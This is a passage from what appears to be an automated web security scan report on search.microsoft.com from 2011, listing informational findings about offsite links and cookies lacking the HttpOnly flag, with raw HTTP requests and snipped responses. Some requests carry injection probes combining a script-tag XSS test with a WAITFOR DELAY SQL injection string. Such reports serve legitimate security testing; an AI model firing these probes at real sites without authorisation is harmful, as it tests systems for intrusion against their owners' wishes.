<li class="wthrslt"><a href="http://www.bing.com/search?q=xss%20sqli%20http%20xmli%20%20%20%20meta%3asearch.msforums.forumid%28690a399e-fac3-4345-8063-d9ac7ffced47&amp;qsc0=0&amp;FORM=BMME">Search the web with Bing</a>
...[SNIP]...
<li class="norslt"><a href="http://www.bing.com/search?q=xss%20sqli%20http%20xmli%20%20%20%20meta%3asearch.msforums.forumid%28690a399e-fac3-4345-8063-d9ac7ffced47&amp;qsc0=0&amp;FORM=BMMO2">Search the web with Bing</a>
...[SNIP]...
<div class="btnweb" id="btn_web"><a MS.SERP.search_bing="web" href="http://www.bing.com/search?q=xss%20sqli%20http%20xmli%20%20%20%20meta%3asearch.msforums.forumid%28690a399e-fac3-4345-8063-d9ac7ffced47&amp;FORM=MSSBMN" onclick="submitForm('sbFormCode0','0',true,'en-US',true);return false;" title="Search the Web"><img class="webbtn" id="WebBtn1" src="/global/search/PublishingImages/WebButton/WebButton_en-US.gif" alt="Search the Web">
...[SNIP]...
<div> <img alt="" id="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcs8ahf9r10000shc7hxv4kia_9k8o/njs.gif?dcsuri=/nojavascript&amp;WT.js=No" /> <img alt="" width="1" height="1" src="http://c.microsoft.com/trans_pixel.aspx" />
...[SNIP]...

2.6. http://search.microsoft.com/Results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.microsoft.com
Path:   /Results.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Results.aspx?mkt=en-US&qsc0=0&q=xss+sqli+http+xmli++++meta%3asearch.msforums.forumid(690a399e-fac3-4345-8063-d9ac7ffced47)++site%3amicrosoft.com HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://search.microsoft.com/results.aspx?q=xss%20sqli%20httpi%20xmli%20meta:Search.MSForums.ForumID(690a399e-fac3-4345-8063-d9ac7ffced47)%20site:microsoft.com&mkt=en-US
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: search.microsoft.com
Proxy-Connection: Keep-Alive
Cookie: WT_FPC=id=295beb90f465350baae1317572472562:lv=1318096803423:ss=1318096803423; omniID=1317583309457_b2b9_155e_a35e_6220df2ab84f; MC1=GUID=20313fe81aaa2f48bd216cefc5ca9385&HASH=e83f&LV=201110&V=3&LU=1317583319514; A=I&I=AxUFAAAAAAC7BwAAYnL5tOtMT3+w/UKgs/F9TA!!&GO=244&CS=127g`\00022010002g20100; WT_NVR_RU=0=msdn:1=:2=; MSID=Microsoft.CreationDate=10/07/2011 21:40:29&Microsoft.LastVisitDate=10/09/2011 00:38:45&Microsoft.VisitStartDate=10/09/2011 00:38:45&Microsoft.CookieId=a85cff55-6bf8-4b3b-b914-c905c8d67337&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=4&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0371-5227-8141-4085; msdn=L=1033; Microsoft.com=SS_Url=&SS=1&SS_Refn_Incr=0; SS_TRACK=SS_IA=0&SS_Refn=&SS_Terms=xss+sqli+httpi+xmli&SS_LastTerm=&SS_LastRefn=; MUID=0E7A9ED66C90608B2B929C50689060F7&TUID=1; mkt1=norm=en-US; mkt2=ui=en-US; MC0=1318123683384

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P1: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Vary: Accept-Encoding
Content-Length: 52791
Date: Sun, 09 Oct 2011 01:27:55 GMT
Connection: close
Set-Cookie: mkt1=norm=en-US; path=/
Set-Cookie: mkt2=ui=en-US; path=/
Cache-Control: no-cache

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en">
...[SNIP]...
<div id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_divAdImage" class="hpFeat_ImageContainer"> <a href="http://clk.atdmt.com/MRT/go/285207471/direct/01/" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_adImageLink" bi:LinkId="001-00-113LMUS004239" bi:CampaignName="(Buy Office_2011_Q3_US)"> <img src="http://www.microsoft.com/global/en-us/preview/PublishingImages/thumbnails/office2010_hs_74x74.png" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_adImage"
...[SNIP]...
<h5 class="hpFeat_Wrap hpFeat_Title hpFeat_Item"> <a href="http://clk.atdmt.com/MRT/go/285207471/direct/01/" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_AdTitleLink" class="hpFeat_Link" bi:LinkId="001-00-113LMUS004239" bi:CampaignName="(Buy Office_2011_Q3_US)">Office Home and Student 2010</a>
...[SNIP]...
<div class="btnweb" id="btn_web"><a MS.SERP.search_bing="web" href="http://www.bing.com/search?q=xss%20sqli%20http%20xmli%20%20%20%20meta%3asearch.msforums.forumid%28690a399e-fac3-4345-8063-d9ac7ffced47%29%20%20site%3amicrosoft.com&amp;FORM=MSSBMN" onclick="submitForm('sbFormCode0','0',true,'en-US',true);return false;" title="Search the Web"><img class="webbtn" id="WebBtn1" src="/global/search/PublishingImages/WebButton/WebButton_en-US.gif" alt="Search the Web">
...[SNIP]...
<li><a href="http://www.bing.com/search?q=xss%20sqli%20http%20xmli%20%20%20%20meta%3Asearch%2Emsforums%2Eforumid%28690a399e%2Dfac3%2D4345%2D8063%2Dd9ac7ffced47%29%20%20site%3Amicrosoft%2Ecom&amp;FORM=BMMO">Search the web with Bing.</a>
...[SNIP]...
<li class="wthrslt"><a href="http://www.bing.com/search?q=xss%20sqli%20http%20xmli%20%20%20%20meta%3asearch.msforums.forumid%28690a399e-fac3-4345-8063-d9ac7ffced47%29%20%20site%3amicrosoft.com&amp;qsc0=0&amp;FORM=BMME">Search the web with Bing</a>
...[SNIP]...
<li class="norslt"><a href="http://www.bing.com/search?q=xss%20sqli%20http%20xmli%20%20%20%20meta%3asearch.msforums.forumid%28690a399e-fac3-4345-8063-d9ac7ffced47%29%20%20site%3amicrosoft.com&amp;qsc0=0&amp;FORM=BMMO2">Search the web with Bing</a>
...[SNIP]...
<div class="btnweb" id="btn_web"><a MS.SERP.search_bing="web" href="http://www.bing.com/search?q=xss%20sqli%20http%20xmli%20%20%20%20meta%3asearch.msforums.forumid%28690a399e-fac3-4345-8063-d9ac7ffced47%29%20%20site%3amicrosoft.com&amp;FORM=MSSBMN" onclick="submitForm('sbFormCode0','0',true,'en-US',true);return false;" title="Search the Web"><img class="webbtn" id="WebBtn1" src="/global/search/PublishingImages/WebButton/WebButton_en-US.gif" alt="Search the Web">
...[SNIP]...
<div> <img alt="" id="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcs8ahf9r10000shc7hxv4kia_9k8o/njs.gif?dcsuri=/nojavascript&amp;WT.js=No" /> <img alt="" width="1" height="1" src="http://c.microsoft.com/trans_pixel.aspx" />
...[SNIP]...

2.7. http://search.microsoft.com/Results_error.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.microsoft.com
Path:   /Results_error.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Results_error.aspx?%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005DA)%3C/script%3E=%27;WAITFOR%20DELAY%20%270:0:25%27--&mkt=en-US HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: search.microsoft.com
Cookie: WT_FPC=id=295beb90f465350baae1317572472562:lv=1318113000839:ss=1318112890953; omniID=1317583309457_b2b9_155e_a35e_6220df2ab84f; MC1=GUID=20313fe81aaa2f48bd216cefc5ca9385&HASH=e83f&LV=201110&V=3&LU=1317583319514; A=I&I=AxUFAAAAAAC7BwAAYnL5tOtMT3+w/UKgs/F9TA!!&GO=244&CS=127g`\00022010002g20100; WT_NVR_RU=0=msdn:1=:2=; MSID=Microsoft.CreationDate=10/07/2011 21:40:29&Microsoft.LastVisitDate=10/09/2011 02:34:57&Microsoft.VisitStartDate=10/09/2011 02:34:57&Microsoft.CookieId=a85cff55-6bf8-4b3b-b914-c905c8d67337&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=15&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0371-5227-8141-4085; msdn=L=1033; Microsoft.com=SS_Url=&SS=1&SS_Refn_Incr=0; MUID=0914779C379B646A20E07519349B641D

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P1: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Vary: Accept-Encoding
Content-Length: 39756
Date: Sun, 09 Oct 2011 12:26:38 GMT
Connection: close
Set-Cookie: mkt1=norm=en-US; path=/
Set-Cookie: mkt2=ui=en-US; path=/
Cache-Control: no-cache

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en">
...[SNIP]...
<div id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_divAdImage" class="hpFeat_ImageContainer"> <a href="http://clk.atdmt.com/MRT/go/285207471/direct/01/" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_adImageLink" bi:LinkId="001-00-113LMUS004239" bi:CampaignName="(Buy Office_2011_Q3_US)"> <img src="http://www.microsoft.com/global/en-us/preview/PublishingImages/thumbnails/office2010_hs_74x74.png" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_adImage"
...[SNIP]...
<h5 class="hpFeat_Wrap hpFeat_Title hpFeat_Item"> <a href="http://clk.atdmt.com/MRT/go/285207471/direct/01/" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_AdTitleLink" class="hpFeat_Link" bi:LinkId="001-00-113LMUS004239" bi:CampaignName="(Buy Office_2011_Q3_US)">Office Home and Student 2010</a>
...[SNIP]...
<div> <img alt="" id="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcs8ahf9r10000shc7hxv4kia_9k8o/njs.gif?dcsuri=/nojavascript&amp;WT.js=No" /> <img alt="" width="1" height="1" src="http://c.microsoft.com/trans_pixel.aspx" />
...[SNIP]...

2.8. http://search.microsoft.com/Search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.microsoft.com
Path:   /Search.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Search.aspx?mkt=en-US&qsc0=0&q=xss%20sqli%20httpi%20xmli%20meta%3aSearch.MSForums.ForumID%28690a399e-fac3-4345-8063-d9ac7ffced47%29%20site%3amicrosoft.com&FORM=HPME HTTP/1.1
Host: search.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P1: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Date: Sun, 09 Oct 2011 01:35:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: mkt1=norm=en-US; path=/
Set-Cookie: mkt2=ui=en-US; path=/
Cache-Control: no-cache
Content-Length: 41477

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en">
...[SNIP]...
<div id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_divAdImage" class="hpFeat_ImageContainer"> <a href="http://clk.atdmt.com/MRT/go/285207471/direct/01/" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_adImageLink" bi:LinkId="001-00-113LMUS004239" bi:CampaignName="(Buy Office_2011_Q3_US)"> <img src="http://www.microsoft.com/global/en-us/preview/PublishingImages/thumbnails/office2010_hs_74x74.png" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_adImage"
...[SNIP]...
<h5 class="hpFeat_Wrap hpFeat_Title hpFeat_Item"> <a href="http://clk.atdmt.com/MRT/go/285207471/direct/01/" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_AdTitleLink" class="hpFeat_Link" bi:LinkId="001-00-113LMUS004239" bi:CampaignName="(Buy Office_2011_Q3_US)">Office Home and Student 2010</a>
...[SNIP]...
<div class="btnweb" id="btn_web"><a MS.SERP.search_bing="web" href="http://www.bing.com/search?q=xss%20sqli%20httpi%20xmli%20meta%3aSearch.MSForums.ForumID%28690a399e-fac3-4345-8063-d9ac7ffced47%29%20site%3amicrosoft.com&amp;FORM=MSSBMN" onclick="submitForm('sbFormCode0','0',true,'en-US',true);return false;" title="Search the Web"><img class="webbtn" id="WebBtn1" src="/global/search/PublishingImages/WebButton/WebButton_en-US.gif" alt="Search the Web">
...[SNIP]...
<li><a href="http://www.bing.com/search?q=xss%20sqli%20httpi%20xmli%20meta%3aSearch.MSForums.ForumID%28690a399e-fac3-4345-8063-d9ac7ffced47%29%20site%3amicrosoft.com&amp;qsc0=0&amp;FORM=BMMH">Search the web with Bing</a>
...[SNIP]...
<div> <img alt="" id="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcs8ahf9r10000shc7hxv4kia_9k8o/njs.gif?dcsuri=/nojavascript&amp;WT.js=No" /> <img alt="" width="1" height="1" src="http://c.microsoft.com/trans_pixel.aspx" />
...[SNIP]...

2.9. http://search.microsoft.com/WorldWide.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.microsoft.com
Path:   /WorldWide.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /WorldWide.aspx?mkt=en-US&qsc0=0&l=1&q=xss%20sqli%20httpi%20xmli%20meta%3aSearch.MSForums.ForumID%28690a399e-fac3-4345-8063-d9ac7ffced47%29%20site%3amicrosoft.com&FORM=WWME HTTP/1.1
Host: search.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P1: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Date: Sun, 09 Oct 2011 01:35:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: mkt1=norm=en-US; path=/
Set-Cookie: mkt2=ui=en-US; path=/
Cache-Control: no-cache
Content-Length: 52941

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en">
...[SNIP]...
<div id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_divAdImage" class="hpFeat_ImageContainer"> <a href="http://clk.atdmt.com/MRT/go/285207471/direct/01/" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_adImageLink" bi:LinkId="001-00-113LMUS004239" bi:CampaignName="(Buy Office_2011_Q3_US)"> <img src="http://www.microsoft.com/global/en-us/preview/PublishingImages/thumbnails/office2010_hs_74x74.png" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_adImage"
...[SNIP]...
<h5 class="hpFeat_Wrap hpFeat_Title hpFeat_Item"> <a href="http://clk.atdmt.com/MRT/go/285207471/direct/01/" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_AdTitleLink" class="hpFeat_Link" bi:LinkId="001-00-113LMUS004239" bi:CampaignName="(Buy Office_2011_Q3_US)">Office Home and Student 2010</a>
...[SNIP]...
<div> <img alt="" id="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcs8ahf9r10000shc7hxv4kia_9k8o/njs.gif?dcsuri=/nojavascript&amp;WT.js=No" /> <img alt="" width="1" height="1" src="http://c.microsoft.com/trans_pixel.aspx" />
...[SNIP]...

2.10. http://search.microsoft.com/results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.microsoft.com
Path:   /results.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /results.aspx?q=xss%20sqli%20httpi%20xmli%20meta:Search.MSForums.ForumID(690a399e-fac3-4345-8063-d9ac7ffced47)%20site:microsoft.com&mkt=en-US HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://social.microsoft.com/Forums/en-US/mas/thread/177e0051-5cf6-4148-ae71-d5033b9be61c
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: search.microsoft.com
Accept-Encoding: gzip, deflate
Cookie: WT_FPC=id=295beb90f465350baae1317572472562:lv=1318096803423:ss=1318096803423; omniID=1317583309457_b2b9_155e_a35e_6220df2ab84f; MC1=GUID=20313fe81aaa2f48bd216cefc5ca9385&HASH=e83f&LV=201110&V=3&LU=1317583319514; A=I&I=AxUFAAAAAAC7BwAAYnL5tOtMT3+w/UKgs/F9TA!!&GO=244&CS=127g`\00022010002g20100; WT_NVR_RU=0=msdn:1=:2=; MSID=Microsoft.CreationDate=10/07/2011 21:40:29&Microsoft.LastVisitDate=10/09/2011 00:38:45&Microsoft.VisitStartDate=10/09/2011 00:38:45&Microsoft.CookieId=a85cff55-6bf8-4b3b-b914-c905c8d67337&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=4&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0371-5227-8141-4085; msdn=L=1033; Microsoft.com=SS_Url=&SS=1&SS_Refn_Incr=0; SS_TRACK=SS_IA=0&SS_Refn=&SS_Terms=xss+sqli+httpi+xmli&SS_LastTerm=&SS_LastRefn=; mkt1=norm=en-US; mkt2=ui=en-US
Proxy-Connection: Keep-Alive
Pragma: no-cache

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P1: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Vary: Accept-Encoding
Content-Length: 52990
Date: Sun, 09 Oct 2011 01:27:49 GMT
Connection: close
Set-Cookie: mkt1=norm=en-US; path=/
Set-Cookie: mkt2=ui=en-US; path=/
Cache-Control: no-cache

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en">
...[SNIP]...
<div id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_divAdImage" class="hpFeat_ImageContainer"> <a href="http://clk.atdmt.com/MRT/go/285207471/direct/01/" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_adImageLink" bi:LinkId="001-00-113LMUS004239" bi:CampaignName="(Buy Office_2011_Q3_US)"> <img src="http://www.microsoft.com/global/en-us/preview/PublishingImages/thumbnails/office2010_hs_74x74.png" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_adImage"
...[SNIP]...
<h5 class="hpFeat_Wrap hpFeat_Title hpFeat_Item"> <a href="http://clk.atdmt.com/MRT/go/285207471/direct/01/" id="ctl00_ctl09_SecondaryItemsRepeater_ctl00_ctl00_AdTitleLink" class="hpFeat_Link" bi:LinkId="001-00-113LMUS004239" bi:CampaignName="(Buy Office_2011_Q3_US)">Office Home and Student 2010</a>
...[SNIP]...
<div class="btnweb" id="btn_web"><a MS.SERP.search_bing="web" href="http://www.bing.com/search?q=xss%20sqli%20httpi%20xmli%20meta%3aSearch.MSForums.ForumID%28690a399e-fac3-4345-8063-d9ac7ffced47%29%20site%3amicrosoft.com&amp;FORM=MSSBMN" onclick="submitForm('sbFormCode0','0',true,'en-US',true);return false;" title="Search the Web"><img class="webbtn" id="WebBtn1" src="/global/search/PublishingImages/WebButton/WebButton_en-US.gif" alt="Search the Web">
...[SNIP]...
<li><a href="http://www.bing.com/search?q=xss%20sqli%20httpi%20xmli%20meta%3ASearch%2EMSForums%2EForumID%28690a399e%2Dfac3%2D4345%2D8063%2Dd9ac7ffced47%29%20site%3Amicrosoft%2Ecom&amp;FORM=BMMO">Search the web with Bing.</a>
...[SNIP]...
<li class="wthrslt"><a href="http://www.bing.com/search?q=xss%20sqli%20httpi%20xmli%20meta%3aSearch.MSForums.ForumID%28690a399e-fac3-4345-8063-d9ac7ffced47%29%20site%3amicrosoft.com&amp;qsc0=0&amp;FORM=BMME">Search the web with Bing</a>
...[SNIP]...
<li class="norslt"><a href="http://www.bing.com/search?q=xss%20sqli%20httpi%20xmli%20meta%3aSearch.MSForums.ForumID%28690a399e-fac3-4345-8063-d9ac7ffced47%29%20site%3amicrosoft.com&amp;qsc0=0&amp;FORM=BMMO2">Search the web with Bing</a>
...[SNIP]...
<div class="btnweb" id="btn_web"><a MS.SERP.search_bing="web" href="http://www.bing.com/search?q=xss%20sqli%20httpi%20xmli%20meta%3aSearch.MSForums.ForumID%28690a399e-fac3-4345-8063-d9ac7ffced47%29%20site%3amicrosoft.com&amp;FORM=MSSBMN" onclick="submitForm('sbFormCode0','0',true,'en-US',true);return false;" title="Search the Web"><img class="webbtn" id="WebBtn1" src="/global/search/PublishingImages/WebButton/WebButton_en-US.gif" alt="Search the Web">
...[SNIP]...
<div> <img alt="" id="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcs8ahf9r10000shc7hxv4kia_9k8o/njs.gif?dcsuri=/nojavascript&amp;WT.js=No" /> <img alt="" width="1" height="1" src="http://c.microsoft.com/trans_pixel.aspx" />
...[SNIP]...

2.11. http://search.microsoft.com/search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.microsoft.com
Path:   /search.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search.aspx?mkt=es-ar HTTP/1.1
Host: search.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P1: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Date: Sun, 09 Oct 2011 01:35:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: mkt1=norm=es-ar; path=/
Set-Cookie: mkt2=ui=en-US; path=/
Cache-Control: no-cache
Content-Length: 36754

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en">
...[SNIP]...
<div class="btnweb" id="btn_web"><a MS.SERP.search_bing="web" href="http://www.bing.com/search?q=&amp;FORM=MSSBMN" onclick="submitForm('sbFormCode0','0',true,'es-AR',true);return false;" title="Buscar en la web"><img class="webbtn" id="WebBtn1" src="/global/search/PublishingImages/WebButton/WebButton_es-AR.gif" alt="Buscar en la web">
...[SNIP]...
<li><a href="http://www.bing.com/search?q=&amp;qsc0=0&amp;FORM=BMMH">Buscar en el Web con Bing</a>
...[SNIP]...
<div> <img alt="" id="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcs8ahf9r10000shc7hxv4kia_9k8o/njs.gif?dcsuri=/nojavascript&amp;WT.js=No" /> <img alt="" width="1" height="1" src="http://c.microsoft.com/trans_pixel.aspx" />
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next
There are 8 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



3.1. http://search.microsoft.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.microsoft.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005EB)%3C/script%3E=%27;WAITFOR%20DELAY%20%270:0:25%27--&mkt=en-US HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: search.microsoft.com
Cookie: WT_FPC=id=295beb90f465350baae1317572472562:lv=1318113000839:ss=1318112890953; omniID=1317583309457_b2b9_155e_a35e_6220df2ab84f; MC1=GUID=20313fe81aaa2f48bd216cefc5ca9385&HASH=e83f&LV=201110&V=3&LU=1317583319514; A=I&I=AxUFAAAAAAC7BwAAYnL5tOtMT3+w/UKgs/F9TA!!&GO=244&CS=127g`\00022010002g20100; WT_NVR_RU=0=msdn:1=:2=; MSID=Microsoft.CreationDate=10/07/2011 21:40:29&Microsoft.LastVisitDate=10/09/2011 02:34:57&Microsoft.VisitStartDate=10/09/2011 02:34:57&Microsoft.CookieId=a85cff55-6bf8-4b3b-b914-c905c8d67337&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=15&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0371-5227-8141-4085; msdn=L=1033; Microsoft.com=SS_Url=&SS=1&SS_Refn_Incr=0; MUID=0914779C379B646A20E07519349B641D; mkt1=norm=en-US; mkt2=ui=en-US

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P1: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Vary: Accept-Encoding
Content-Length: 40098
Date: Sun, 09 Oct 2011 12:27:36 GMT
Connection: close
Set-Cookie: mkt1=norm=en-US; path=/
Set-Cookie: mkt2=ui=en-US; path=/
Cache-Control: no-cache

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en">
...[SNIP]...

3.2. http://search.microsoft.com/AdvancedSearch.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.microsoft.com
Path:   /AdvancedSearch.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdvancedSearch.aspx HTTP/1.1
Host: search.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: AkamaiGHost
Content-Length: 0
Location: /AdvancedSearch.aspx?mkt=en-US
Date: Sun, 09 Oct 2011 01:35:22 GMT
Connection: close
Set-Cookie: mkt1=norm=en-US; path=/
Set-Cookie: mkt2=ui=en-US; path=/


3.3. http://search.microsoft.com/Help.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.microsoft.com
Path:   /Help.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Help.aspx HTTP/1.1
